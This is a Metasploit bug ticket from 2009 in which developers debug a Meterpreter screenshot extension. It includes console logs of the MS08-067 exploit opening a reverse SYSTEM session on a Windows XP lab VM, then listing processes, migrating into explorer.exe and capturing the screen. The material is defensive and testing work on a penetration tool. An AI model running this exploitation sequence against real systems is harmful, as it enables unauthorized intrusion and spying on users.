Bug #422
Meterpreter espia extension, connection dies after successful screenshot
| Status: | Closed | Start date: | 10/26/2009 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | Efrain Torres | % Done: | 0% |
|
| Category: | meterpreter - win32 | |||
| Target version: | Metasploit 3.3 | |||
| Resolution: | worksforme | Release Note: |
Description
Reported by CG. Exploited XP SP3 using MS08-067, migrated to explorer.exe, screenshot then crash after download.
History
Updated by HD Moore over 2 years ago
- Category set to meterpreter - win32
Updated by HD Moore over 2 years ago
This doesn't reproduce for me:
meterpreter > screenshot /tmp/x.bmp
[*] Image saved to /tmp/x.bmp
Opening browser to image...
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
364 smss.exe \SystemRoot\System32\sm
Updated by Chris Gates over 2 years ago
did you migrate from SYSTEM? tested again on XP SP1 VM, same thing.
meterpreter > screenshot /tmp/blah2.bmp
[*] Image saved to /tmp/blah2.bmp
Opening browser to image...
meterpreter > ls
[-] Operation timed out.
Updated by HD Moore over 2 years ago
Tried from system, no problems:
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.220
RHOST => 192.168.0.220
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
getuid[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.220:1038)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
268 cmd.exe C:\WINDOWS\system32\cmd.exe
360 smss.exe \SystemRoot\System32\smss.exe
500 alg.exe C:\WINDOWS\System32\alg.exe
544 wmiprvse.exe C:\WINDOWS\System32\wbem\wmiprvse.exe
684 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
708 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
752 services.exe C:\WINDOWS\system32\services.exe
764 lsass.exe C:\WINDOWS\system32\lsass.exe
920 svchost.exe C:\WINDOWS\system32\svchost.exe
1020 svchost.exe C:\WINDOWS\system32\svchost.exe
1112 svchost.exe C:\WINDOWS\System32\svchost.exe
1160 svchost.exe C:\WINDOWS\System32\svchost.exe
1280 svchost.exe C:\WINDOWS\System32\svchost.exe
1312 Explorer.EXE C:\WINDOWS\Explorer.EXE
1456 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1520 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1528 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
1536 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
1580 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
1696 rundll32.exe C:\WINDOWS\system32\rundll32.exe
1720 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
meterpreter > migrate 1312
[*] Migrating to 1312...
[*] Migration completed successfully.
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot /tmp/boom.bmp
[*] Image saved to /tmp/boom.bmp
Opening browser to image...
meterpreter > getuid
Server username: XPDEV\Developer
meterpreter > sysinfo
Computer: XPDEV
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter >
Updated by Chris Gates over 2 years ago
well a couple of issues with VMs does not a bug make, if no one else can reproduce i suppose we can close the ticket for the time being.
Updated by HD Moore over 2 years ago
- Status changed from New to Closed
- Resolution set to worksforme
OK, we can reopen if it starts showing up elsewhere.